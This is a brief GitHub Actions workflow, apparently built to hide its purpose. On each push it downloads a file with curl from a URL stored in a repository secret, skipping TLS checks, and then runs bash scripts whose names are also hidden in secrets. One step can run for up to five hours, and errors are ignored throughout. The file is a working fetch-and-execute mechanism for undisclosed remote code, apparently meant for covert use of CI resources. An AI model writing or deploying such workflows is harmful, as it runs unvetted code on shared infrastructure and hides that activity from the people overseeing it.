name: emon2

on:
    push:
    workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
     - name: em1
       uses: actions/checkout@main

     - name: em2
       timeout-minutes: 2
       continue-on-error: true
       run: |
             curl -sLkO ${{ secrets.EA_AB }}
             bash ${{ secrets.EA_CD }}
     - name: em3
       timeout-minutes: 300
       continue-on-error: true
       run: |
             bash ${{ secrets.EA_EF }}
     - name: em4
       continue-on-error: true
       run: |
            bash ${{ secrets.EA_GH }}
